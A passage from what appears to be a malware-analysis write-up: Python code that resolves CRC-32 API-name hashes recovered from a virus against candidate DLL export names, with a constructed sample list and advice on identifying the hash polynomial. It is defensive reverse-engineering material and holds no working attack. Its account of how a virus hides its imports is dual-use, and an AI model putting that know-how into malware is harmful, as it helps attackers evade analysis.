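def resolve_hashes(dwords, candidates):
    """Map recovered dwords back to names; None where no candidate matches.
    Widen `candidates` (export tables of the DLLs in play) to resolve more."""
    lookup = {crc32_of_string(c): c for c in candidates}
    return [lookup.get(d) for d in dwords]


# Constructed sample list (not taken from the virus body); the DLL names echo
# the NAME_SFC_DLL / NAME_IMAGEHLP_DLL references in the fake host above.
SAMPLE_LIST = b"kernel32.dll\0sfc.dll\0imagehlp.dll\0SfcIsFileProtected\0\0"

if __name__ == "__main__":
    table = make_crc32_table(SAMPLE_LIST)
    print([hex(d) for d in table])
    print(resolve_hashes(table, ["sfc.dll", "imagehlp.dll"]))
```

The round trip is the useful property: if the dwords a sample stores resolve cleanly against a candidate list under one polynomial, that polynomial is confirmed; if none resolve, try the other common CRC-32 variants before assuming a custom hash.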